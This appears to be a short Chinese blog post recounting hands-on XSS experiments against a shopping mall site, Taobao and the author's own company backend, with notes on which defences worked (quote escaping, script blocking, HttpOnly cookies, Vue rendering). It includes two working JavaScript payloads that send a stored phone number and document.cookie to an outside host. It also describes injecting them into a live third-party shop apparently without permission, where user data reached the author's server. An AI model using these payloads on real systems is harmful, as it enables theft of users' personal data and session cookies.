XSS攻击 - 实际体验

找一个商城

找了一个商场,在评论部分加了一段 script ,发现,成功注入并且执行了。。。。。。大家对这个的防范意识还是不强呢。

首先,我在下单的页面,添加了一段脚本
$.ajax({
    url: 'http://mazhaoyang.cn/demos/redpocket/',
    data: {
        userInfo: window.sessionStorage.getItem('PHONE')
    }
})

然后,我在订单详情页面,发现相关数据请求到我前置的接口了

看看淘宝的处理

首先,我只放了一段ajax,没有放script标签

发现它将引号转码了

然后,我将完整script放进去

直接被拦截下来了。果然大厂出来的,就是不一样,很到位。

试一下自家后台

var xhr = new XMLHttpRequest()
var cookie = JSON.stringify(document.cookie.split("; "))
var url = `http://mazhaoyang.cn/index.php/Home/Output/RedpocketAjaxList.html?userid=${cookie}`
xhr.open('GET', url, true )
xhr.send()

可是一直获取不到对应的数据。因为我们token是存在cookie的,但是怎么都获取不到。这时候仔细一看,发现居然设置的HttpOnly。

这种防范还真是不错,意外之喜。

看一下vue项目的处理

分析了一下,vue对于保存数据并没有做注入处理

数据返回的时候,也没有处理过

但是实际上,并没有执行对应的脚本。

我推测,是在render的时候,将注入的脚本数据过滤掉了。

随机浏览